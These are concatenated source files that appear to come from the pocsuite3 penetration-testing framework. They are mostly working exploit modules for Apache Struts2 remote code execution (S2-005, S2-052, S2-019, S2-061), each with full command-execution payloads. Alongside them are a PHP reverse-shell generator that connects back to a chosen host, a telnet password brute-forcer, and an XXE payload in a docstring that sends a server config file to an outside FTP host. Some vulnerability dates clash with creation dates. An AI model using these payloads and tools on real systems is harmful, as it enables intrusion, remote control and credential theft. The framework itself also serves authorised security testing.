    if vulType not in ['Arbitrary File Read', 'Path Traversal']:
        rows_to_remove += [41, 80, 98, 99]

    # if vul is rce, the shell mode is required
    if rceVul:
        rows_to_remove += [89]
    else:
        rows_to_remove += [9, 40, 79, 90, 91, 92, 93]

    if vulType in ['Arbitrary File Read', 'Code Execution', 'Command Execution', 'Path Traversal']:
        rows_to_remove += [57, 67, 81, 97]

    for i in set(rows_to_remove):
        codes.pop(i)

    poc_codes = ''
    for _, c in codes.items():
        poc_codes += f'{c}\n'

    chars = '()'
    filepath = f'./{vulDate.replace("-", "")}_{pocName}.py'.replace(' ', '_').lower()
    for c in chars:
        filepath = filepath.replace(c, '')
    filepath = input(f'Filepath in which to save the poc [{filepath}]') or filepath
    with open(filepath, 'w+') as fw:
        fw.write(poc_codes)

    logger.info(f'Your poc has been saved in {filepath} :)')


def create_poc_plugin_template():
    if not conf.new:
        return
    try:
        new_poc()
    except KeyboardInterrupt:
        logger.error('KeyboardInterrupt')

    sys.exit()



from collections import OrderedDict
from urllib.parse import quote

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString
from pocsuite3.lib.utils import random_str


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2033-11-15'
    createDate = '2023-11-15'
    updateDate = '2023-11-15'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-005']
    name = 'Apache Struts2 s2-005'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.0.0 - Struts 2.1.8.1'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''Struts 2.0.0 - Struts 2.1.8.1'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('', description="可执行的shell命令")
        return o

    def exp(self, payload, excpayload):
        payload2 = excpayload.format(cmd=quote(payload))
        r = requests.get(self.url + "?" + payload2, stream=True)
        html = list()
        for line in r.iter_lines():
            if b'\x00' in line:
                break
            line = line.decode('UTF-8')
            html.append(line.strip())
        html2 = '\r\n'.join(html).strip()
        return html2

    def _verify(self):
        p = self._check()
        if p:
            return self.parse_output(p)

    def _check(self):
        result = {}
        hash_str = random_str(10)
        exec_payload1 = "%28%27%5Cu0023context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27{cmd}%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte[51020]%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29"
        exec_payload2 = "%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43mycmd%5C75%5C%27{cmd}%5C%27%27%29%28d%29%29&%28h%29%28%28%27%5C43myret%5C75@java.lang.Runtime@getRuntime%28%29.exec%28%5C43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27%5C43mydat%5C75new%5C40java.io.DataInputStream%28%5C43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27%5C43myres%5C75new%5C40byte[51020]%27%29%28d%29%29&%28k%29%28%28%27%5C43mydat.readFully%28%5C43myres%29%27%29%28d%29%29&%28l%29%28%28%27%5C43mystr%5C75new%5C40java.lang.String%28%5C43myres%29%27%29%28d%29%29&%28m%29%28%28%27%5C43myout%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27%5C43myout.getWriter%28%29.println%28%5C43mystr%29%27%29%28d%29%29"

        cmd = [
            "echo " + hash_str,
            "cmd.exe /c echo " + hash_str
        ]
        for payload1 in cmd:
            html = self.exp(payload1, exec_payload1)
            if hash_str in html:
                result["VerifyInfo"] = {
                    "URL": self.url,
                    "PAYLOAD": exec_payload1
                }
                return self.parse_output(result)

        cmd2 = [
            "echo " + hash_str,
            "cmd.exe /c echo " + hash_str
        ]
        for payload2 in cmd2:
            html = self.exp(payload2, exec_payload2)
            if hash_str in html:
                result["VerifyInfo"] = {
                    "URL": self.url,
                    "PAYLOAD": exec_payload2
                }
                return result
        return False

    def _attack(self):
        result = {}
        p = self._check()
        if p:
            command = self.get_option("command")

            exec_payload1 = "%28%27%5Cu0023context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27{cmd}%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte[51020]%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29"
            exec_payload2 = "%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43mycmd%5C75%5C%27{cmd}%5C%27%27%29%28d%29%29&%28h%29%28%28%27%5C43myret%5C75@java.lang.Runtime@getRuntime%28%29.exec%28%5C43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27%5C43mydat%5C75new%5C40java.io.DataInputStream%28%5C43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27%5C43myres%5C75new%5C40byte[51020]%27%29%28d%29%29&%28k%29%28%28%27%5C43mydat.readFully%28%5C43myres%29%27%29%28d%29%29&%28l%29%28%28%27%5C43mystr%5C75new%5C40java.lang.String%28%5C43myres%29%27%29%28d%29%29&%28m%29%28%28%27%5C43myout%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27%5C43myout.getWriter%28%29.println%28%5C43mystr%29%27%29%28d%29%29"

            html1 = self.exp(command, exec_payload1)
            html2 = self.exp(command, exec_payload2)
            result["VerifyInfo"] = {
                "URL": self.url,
                "PAYLOAD_1": exec_payload1,
                "OUTPUT_1": html1,
                "PAYLOAD_2": exec_payload2,
                "OUTPIT_2": html2
            }
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import unittest


class TestCase(unittest.TestCase):
    def setUp(self):
        pass

    def tearDown(self):
        pass

    def verify_result(self):
        pass

    def test_cmd_run(self):
        pipeline = os.popen('pocsuite -k ecshop --options')

        # os.popen default encoding may not be utf-8
        res = pipeline.buffer.read().decode('utf-8')

        self.assertTrue('You can select dict_keys' in res)



# Family: {"parameter name": "parameter datatype"},
# --OR--
# Family: {"parameter name": ("parameter datatype", "category name used for common outputs feature")},

optDict = {
    'Target': {
        'url': 'string',
        'url_file': 'string',
        'ports': 'string',
        'skip_target_port': 'boolean',
        'poc': 'string',
        'poc_keyword': 'string',
        'configFile': 'string'
    },
    'Mode': {
        'mode': 'string'
    },
    'Request': {
        'cookie': 'string',
        'host': 'string',
        'referer': 'string',
        'agent': 'string',
        'proxy': 'string',
        'proxy_cred': 'string',
        'timeout': 'float',
        'retry': 'integer',
        'delay': 'string',
        'headers': 'string'
    },
    'Account': {
        'ceye_token': 'string',
        'oob_server': 'string',
        'oob_token': 'string',
        'seebug_token': 'string',
        'zoomeye_token': 'string',
        'shodan_token': 'string',
        'fofa_user': 'string',
        'fofa_token': 'string',
        'quake_token': 'string',
        'hunter_token': 'string',
        'censys_uid': 'string',
        'censys_secret': 'string'
    },
    'Modules': {
        'dork': 'string',
        'dork_zoomeye': 'string',
        'dork_shodan': 'string',
        'dork_fofa': 'string',
        'dork_quake': 'string',
        'dork_hunter': 'string',
        'dork_censys': 'string',
        'max_page': 'integer',
        'page_size': 'string',
        'search_type': 'string',
        'vul_keyword': 'string',
        'ssvid': 'string',
        'connect_back_host': 'string',
        'connect_back_port': 'string',
        'enable_tls_listener': 'boolean',
        "comparison": 'boolean',
        'dork_b64': 'boolean'
    },
    'Optimization': {
        'output_path': 'string',
        'plugins': 'string',
        'pocs_path': 'string',
        'threads': 'integer',
        'batch': 'string',
        'check_requires': 'boolean',
        'quiet': 'boolean',
        'ppt': 'boolean',
        'pcap': 'boolean',
        'rule': 'boolean',
        'rule_req': 'boolean',
        'rule_filename': 'string',
        'no_check': 'boolean'
    },
    'Poc options': {
        'show_options': 'boolean'
    }
}



from .reverse_tcp import handle_listener_connection
from .reverse_tcp import start_listener
from .reverse_tcp import REVERSE_PAYLOAD
from .bind_tcp import (bind_shell, bind_tcp_shell, bind_telnet_shell)
from .bind_tcp import BIND_PAYLOAD

__all__ = ('handle_listener_connection', 'start_listener', 'REVERSE_PAYLOAD',
           'bind_shell', 'bind_tcp_shell', 'bind_telnet_shell', 'BIND_PAYLOAD')



import shlex
from collections import OrderedDict

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2029-5-8'
    createDate = '2019-5-8'
    updateDate = '2019-5-8'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-052']
    name = 'Apache Struts2 s2-052'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.1.6 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''S2-052:影响版本Struts 2.1.2-2.3.33,2.5-2.5.12; POST请求发送数据,不需要参数;'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('touch /var/tmp/123321', description="可执行的shell命令")
        return o

    def parse_cmd(self, cmd, type='string'):
        """命令解析，将要执行的命令解析为字符串格式"""
        cmd = shlex.split(cmd)
        if type == 'string':
            cmd_str = '"' + '","'.join(cmd) + '"'
        elif type == 'xml':
            cmd_str = '<string>' + '</string><string>'.join(cmd) + '</string>'
        else:
            cmd_str = cmd
        return cmd_str

    def _attack(self):
        return self._verify()

    def _verify(self):
        result = {}
        headers = {
            "Content-Type": 'application/xml'
        }
        exec_payload = """<map>
          <entry>
            <jdk.nashorn.internal.objects.NativeString>
              <flags>0</flags>
              <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
                <dataHandler>
                  <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
                    <is class="javax.crypto.CipherInputStream">
                      <cipher class="javax.crypto.NullCipher">
                        <initialized>false</initialized>
                        <opmode>0</opmode>
                        <serviceIterator class="javax.imageio.spi.FilterIterator">
                          <iter class="javax.imageio.spi.FilterIterator">
                            <iter class="java.util.Collections$EmptyIterator"/>
                            <next class="java.lang.ProcessBuilder">
                              <command>
                                {cmd}
                              </command>
                              <redirectErrorStream>false</redirectErrorStream>
                            </next>
                          </iter>
                          <filter class="javax.imageio.ImageIO$ContainsFilter">
                            <method>
                              <class>java.lang.ProcessBuilder</class>
                              <name>start</name>
                              <parameter-types/>
                            </method>
                            <name>foo</name>
                          </filter>
                          <next class="string">foo</next>
                        </serviceIterator>
                        <lock/>
                      </cipher>
                      <input class="java.lang.ProcessBuilder$NullInputStream"/>
                      <ibuffer></ibuffer>
                      <done>false</done>
                      <ostart>0</ostart>
                      <ofinish>0</ofinish>
                      <closed>false</closed>
                    </is>
                    <consumed>false</consumed>
                  </dataSource>
                  <transferFlavors/>
                </dataHandler>
                <dataLen>0</dataLen>
              </value>
            </jdk.nashorn.internal.objects.NativeString>
            <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
          </entry>
          <entry>
            <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
            <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
          </entry>
        </map>"""
        cmd = self.get_option("command")
        cmd = self.parse_cmd(cmd, type='xml')
        data = exec_payload.format(cmd=cmd)
        html = requests.post(self.url, data=data, headers=headers).text
        if html:
            result["VerifyInfo"] = {
                "URL": self.url,
                "success": "success!"
            }
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



from .base import ShellCode


class PhpShellCode(ShellCode):
    """
        Class with shellcode for php language
    """

    def __init__(self, connect_back_ip='localhost', connect_back_port=5555, prefix='<?php', suffix='?>'):
        ShellCode.__init__(self, connect_back_ip=connect_back_ip,
                           connect_back_port=connect_back_port,
                           prefix=prefix,
                           suffix=suffix)

    def get_phpinfo(self):
        """ Function to get phpinfo """
        phpcode = "<?php phpinfo(); ?>"
        return phpcode

    def get_phpcode(self):
        """ Function to get php shellcode """

        if not self.connect_back_ip or not self.connect_back_port:
            print("Settings for connect back listener must be defined")
            return False

        phpcode = """
        $address="{{LOCALHOST}}";
        $port={{LOCALPORT}};
        $buff_size=2048;
        $timeout=120;
        $sock=fsockopen($address,$port) or die("Cannot create a socket");
        while ($read=fgets($sock,$buff_size)) {
            $out="";
            if ($read) {
                if (strcmp($read,"quit")===0 || strcmp($read,"q")===0) {
                    break;
                }
                ob_start();
                passthru($read);
                $out=ob_get_contents();
                ob_end_clean();
            }
            $length=strlen($out);
            while (1) {
                $sent=fwrite($sock,$out,$length);
                if ($sent===false) {
                    break;
                }
                if ($sent<$length) {
                    $st=substr($st,$sent);
                    $length-=$sent;
                } else {
                    break;
                }
            }
        }
        fclose($sock);
        """
        phpcode = self.format_shellcode(phpcode)
        phpcode = "{prefix}{code}{suffix}".format(prefix=self.prefix, code=phpcode, suffix=self.suffix)
        return phpcode

    def get_shellcode(self, inline=False):
        shell = self.get_phpcode()
        if inline:
            shell = self.make_inline(shell)
        return shell


if __name__ == '__main__':
    p = PhpShellCode()
    print(p.get_shellcode())



"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit https://pocsuite.org
"""
import itertools
import queue
import socket
import telnetlib

from pocsuite3.api import POCBase, Output, register_poc, logger, POC_CATEGORY, VUL_TYPE
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.threads import run_threads


class DemoPOC(POCBase):
    vulID = '89687'
    version = '3'
    author = ['seebug']
    vulDate = '2018-09-19'
    createDate = '2018-09-19'
    updateDate = '2018-09-19'
    references = ['https://www.seebug.org/vuldb/ssvid-89687']
    name = 'Telnet 弱密码'
    appPowerLink = ''
    appName = 'telnet'
    appVersion = 'All'
    vulType = VUL_TYPE.WEAK_PASSWORD
    desc = '''telnet 存在弱密码，导致攻击者可登录主机进行恶意操作'''
    samples = ['']
    category = POC_CATEGORY.TOOLS.CRACK
    protocol = POC_CATEGORY.PROTOCOL.TELNET

    def _verify(self):
        result = {}
        host = self.getg_option("rhost")
        port = self.getg_option("rport") or 23

        telnet_burst(host, port)
        if not result_queue.empty():
            username, password = result_queue.get()
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Username'] = username
            result['VerifyInfo']['Password'] = password
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')

        return output


task_queue = queue.Queue()
result_queue = queue.Queue()


def get_word_list():
    common_username = ('Administrator', 'administrator', 'telnet',
                       'test', 'root', 'guest', 'admin', 'daemon', 'user')
    with open(paths.WEAK_PASS) as f:
        return itertools.product(common_username, f)


def port_check(host, port=23):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect_ex((host, int(port)))
    if connect == 0:
        return True
    else:
        s.close()
        return False


def telnet_login(host, port, username, password):
    ret = False
    key = [b'>', b'Login', b'login']
    tn = None
    try:
        for wrap in [b'\n', b'\r\n']:
            tn = telnetlib.Telnet()
            tn.open(host, port, timeout=6)
            tn.read_until(b'login: ', timeout=3)
            tn.write(username.encode() + wrap)
            if password:
                tn.read_until(b'password: ', timeout=3)
                tn.write(password.encode() + wrap)
            tmp = tn.expect(key, timeout=3)
            if b'>' in tmp[2]:
                ret = True
                break
    except Exception:
        pass
    finally:
        if tn:
            tn.close()
    return ret


def task_init(host, port):
    tmp = set()
    for username, password in get_word_list():
        if username not in tmp:
            task_queue.put((host, port, username.strip(), ''))
            tmp.add(username)
        task_queue.put((host, port, username.strip(), password.strip()))


def task_thread():
    while not task_queue.empty():
        host, port, username, password = task_queue.get()
        logger.info('try burst {}:{} use username:{} password:{}'.format(
            host, port, username, password))
        if telnet_login(host, port, username, password):
            with task_queue.mutex:
                task_queue.queue.clear()
            result_queue.put((username, password))


def telnet_burst(host, port):
    if not port_check(host, port):
        return

    try:
        task_init(host, port)
        run_threads(1, task_thread)
    except Exception:
        pass


register_poc(DemoPOC)



import random
from collections import OrderedDict
from urllib.parse import quote

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString
from pocsuite3.lib.utils import random_str


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2029-5-8'
    createDate = '2019-5-8'
    updateDate = '2019-5-8'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-019']
    name = 'Apache Struts2 s2-019'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.0.0 - Struts 2.3.15.1'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''S2-019:影响版本Struts 2.0.0-2.3.15.1'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('ls', description="可执行的shell命令")
        return o

    def _verify(self):
        p = self._check()
        if p:
            return self.parse_output(p)

    def _check(self):
        result = {}
        exec_payload = "%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'{cmd}'%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close()"
        cmd = "id"
        html = requests.get(
            self.url + "?debug=command&expression={payload}".format(payload=exec_payload.format(cmd=quote(cmd)))).text
        if "groups=" in html:
            result["VerifyInfo"] = {
                "URL": self.url,
            }

            return result
        return False

    def _attack(self):
        p = self._verify()
        result = {}
        if p:
            exec_payload = "%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'{cmd}'%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close()"
            cmd = self.get_option("command")
            html = requests.get(
                self.url + "?debug=command&expression={payload}".format(
                    payload=exec_payload.format(cmd=quote(cmd)))).text
            if html:
                result["VerifyInfo"] = {
                    "URL": self.url,
                    "result": html.replace("\x00", "").encode()
                }

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



from collections import OrderedDict
from collections import OrderedDict
from urllib.parse import quote

from lxml import etree

from pocsuite3.api import Output, POCBase, logger, requests
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString
from pocsuite3.lib.core.register import register_poc


class DemoPOC(POCBase):
    vulID = '99063'  # ssvid
    version = '3.0'
    author = ['']
    vulDate = '2020-12-09'
    createDate = '2020-12-09'
    updateDate = '2020-12-09'
    references = ['https://www.seebug.org/vuldb/ssvid-99063']
    name = 'Apache Struts2 s2-061'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.0.0 - Struts 2.5.25'
    vulType = VUL_TYPE.CODE_EXECUTION
    suricata_request = '''http.uri; url_decode; content:"#"; content:".newInstance("; content:".exec(";'''
    suricata_response = ''''''
    desc = '''
    Apache Struts2 061 RCE
    '''
    samples = []
    install_requires = ['']
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('ls', description="可执行的shell命令")
        return o

    def exploit(self):
        result = {}
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        cmd = self.get_option("command")
        payload = "%{('Powered_by_Unicode_Potats0,enjoy_it').(#UnicodeSec = #application['org.apache.tomcat.InstanceManager']).(#potats0=#UnicodeSec.newInstance('org.apache.commons.collections.BeanMap')).(#stackvalue=#attr['struts.valueStack']).(#potats0.setBean(#stackvalue)).(#context=#potats0.get('context')).(#potats0.setBean(#context)).(#sm=#potats0.get('memberAccess')).(#emptySet=#UnicodeSec.newInstance('java.util.HashSet')).(#potats0.setBean(#sm)).(#potats0.put('excludedClasses',#emptySet)).(#potats0.put('excludedPackageNames',#emptySet)).(#exec=#UnicodeSec.newInstance('freemarker.template.utility.Execute')).(#cmd={'" + cmd + "'}).(#res=#exec.exec(#cmd))}"
        if cmd:
            payload = quote(payload)
            data = f"name={payload}&age=1"
            resp = requests.post(self.url.rstrip("/"), data=data, headers=headers)
            try:
                tree = etree.HTML(resp.text)
                # 使用 XPath 匹配值
                cmd_result = tree.xpath("//input[@name='name']/@id")[0]
            except:
                pass
            if resp.status_code == 200:
                result["VerifyInfo"] = {
                    "result": cmd_result.replace("\x00", "").encode(),
                }
        return result

    def _verify(self):
        result = {}
        try:
            result = self.exploit()
        except Exception as e:
            logger.error(str(e))
        return self.parse_output(result)

    def _attack(self):
        result = {}
        try:
            result = self.exploit()
        except Exception as e:
            logger.error(str(e))
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



#!usr/bin/env python
# -*- coding:utf-8 -*-
"""
@author: longofo
@file: __init__.py
@time: 2019/03/23
"""
import os
import random
import socket
import ssl
import threading
import time
from http.server import SimpleHTTPRequestHandler, HTTPServer
from pocsuite3.lib.utils import gen_cert
from pocsuite3.lib.core.common import check_port
from pocsuite3.lib.core.common import get_host_ip, get_host_ipv6
from pocsuite3.lib.core.data import logger, paths
from pocsuite3.lib.core.exception import PocsuiteSystemException


class PHTTPSingleton(type):
    '''
    HTTP server only allow one instance in pocsuite3
    '''
    _instance = None

    def __call__(cls, *args, **kwargs):
        if cls._instance is None:
            cls._instance = super(PHTTPSingleton, cls).__call__(*args, **kwargs)
        return cls._instance


class BaseRequestHandler(SimpleHTTPRequestHandler):
    def do_GET(self):
        """
        默认直接将当前目录结构映射到HTTP请求,即调用SimpleHTTPRequestHandler的do_GET方法

        可自定义响应信息,像下面这样:
        ```
        path = self.path
        status = 404
        count = 0

        xxe_dtd = '''<!ENTITY % d SYSTEM "file:///opt/zimbra/conf/localconfig.xml"><!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://{}:2121/%d;'>">'''.format(
            get_host_ip())
        if path == "/xxe_dtd":
            count = len(xxe_dtd)
            status = 200
            self.send_response(status)
            self.send_header('Content-Type', 'text/html')
            self.send_header('Content-Length', '{}'.format(count))
            self.end_headers()
            self.wfile.write(xxe_dtd.encode())
            return
        self.send_response(status)
        self.send_header('Content-Type', 'text/html')
        self.send_header("Content-Length", "{}".format(count))
        self.end_headers()
        ```
        """
        SimpleHTTPRequestHandler.do_GET(self)

    def do_HEAD(self):
        '''
        默认调用SimpleHTTPRequestHandler的do_HEAD方法

        可自定义响应信息,像下面这样:
        ```
        status = 404

        if self.path.endswith('jar'):
            status = 200
        self.send_response(status)
        self.send_header("Content-type", "text/html")
        self.send_header("Content-Length", "0")
        self.end_headers()
        ```
        '''
        SimpleHTTPRequestHandler.do_HEAD(self)


class HTTPServerV6(HTTPServer):
    address_family = socket.AF_INET6


class HTTPServerV4(HTTPServer):
    address_family = socket.AF_INET


class PHTTPServer(threading.Thread, metaclass=PHTTPSingleton):
    def __init__(self, bind_ip='0.0.0.0', bind_port=6666, is_ipv6=False, use_https=False,
                 certfile=os.path.join(paths.POCSUITE_TMP_PATH, 'cacert.pem'),
                 requestHandler=BaseRequestHandler):
        threading.Thread.__init__(self)
        self.bind_ip = bind_ip
        self.bind_port = int(bind_port)
        self.is_ipv6 = is_ipv6
        self.https = use_https
        if self.https:
            self.scheme = 'https'
            gen_cert(filepath=certfile)
        else:
            self.scheme = 'http'

        self.certfile = certfile
        self.server_locked = False  # Avoid call start method muti-times
        self.server_started = False  # Aviod start server mutl-times
        self.requestHandler = requestHandler
        if ':' in bind_ip:
            ipv6 = get_host_ipv6()
            if not ipv6:
                logger.error('Your machine may not support ipv6')
                raise PocsuiteSystemException
            self.host_ip = ipv6
            self.httpserver = HTTPServerV6
            self.is_ipv6 = True
        else:
            self.is_ipv6 = False
            self.host_ip = get_host_ip()
            self.httpserver = HTTPServerV4

        self.url = f'{self.scheme}://{self.bind_ip}:{self.bind_port}'
        if self.is_ipv6:
            self.url = f'{self.scheme}://[{self.bind_ip}]:{self.bind_port}'

        self.__flag = threading.Event()  # The identifier used to pause the thread
        self.__flag.set()  # set flag True
        self.__running = threading.Event()  # The identifier used to stop the thread
        self.__running.set()  # set running True

    def start(self, daemon=True):
        # Http server can only allow start once in pocsuite3, avoid muti-threading start muti-times
        if self.server_locked:
            logger.info(f'Httpd serve has been started on {self.url}')
            return

        '''
        fix httpserver module hangs on macos platform
        https://github.com/knownsec/pocsuite3/issues/325
        '''
        self.check_ip = self.host_ip
        if self.bind_ip == '0.0.0.0':
            self.check_ip = '127.0.0.1'
        elif self.bind_ip == '::':
            self.check_ip = '::1'

        if check_port(self.check_ip, self.bind_port):
            logger.error('Port {} has been occupied, start Httpd serve failed!'.format(self.bind_port))
            return

        self.server_locked = True
        self.setDaemon(daemon)
        threading.Thread.start(self)
        # Detect http server is started or not
        logger.info('Detect {} server is runing or not...'.format(self.scheme))
        detect_count = 10
        while detect_count:
            try:
                if check_port(self.check_ip, self.bind_port):
                    break
            except Exception as ex:
                logger.error(str(ex))
            time.sleep(random.random())
            detect_count -= 1

    def run(self):
        try:
